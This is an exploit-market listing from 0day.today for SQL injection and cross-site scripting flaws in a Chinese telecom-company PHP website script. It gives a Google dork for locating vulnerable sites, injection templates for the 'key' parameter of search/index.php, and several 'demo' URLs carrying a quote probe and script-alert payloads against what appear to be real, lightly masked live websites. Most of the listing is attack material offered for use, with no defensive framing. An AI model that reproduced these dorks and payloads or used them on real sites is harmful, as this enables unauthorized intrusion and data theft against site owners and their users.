[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Chinese Script SQL Injection / XSS Vulnerabilities

Author
r3nw4
Risk
[
Security Risk High
]
0day-ID
0day-ID-23951
Category
web applications
Date add
04-08-2015
Platform
php
# Exploit Title: [Chinese Script SQLi+XSS]
# Google Dork: [通信设备公司网站 Copyright(C)2009-2010]
# Exploit Author: [R3NW4]
# Platform: (WebApps)
# Version: [All Versions]
# Tested on: [Linux(Debian)]
# Greetz: All Kurdish Hackers - Kurdistan - Peshmarga
-----------------------

SQL:
Site.com/Path/search/index.php?imageField.x=0&imageField.y=0&key=[SQL]

XSS:
Site.com/Path/search/index.php?imageField.x=0&imageField.y=0&key=[XSS]

------------------------

Demo:
http://verypXos.Xcn/search/index.php?imageField.x=0&imageField.y=0&key=1'
http://4037.wXebmall.yunhosting.com/search/index.php?imageField.x=0&imageField.y=0&key=1'
http://demo.Xgotohost2.com/3005/search/index.php?imageField.x=0&imageField.y=0&key=1'
http://4037X.webmall.yunhosting.com/search/index.php?imageField.x=8&imageField.y=3&key=%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E
http://027X10010.net/search/index.php?a=0&imageField=%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3B%3C%2Fscript%3E&key=%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3B%3C%2Fscript%3E

-------------------------

https://twitter.com/R3NW4

#  0day.today [2024-12-26]  #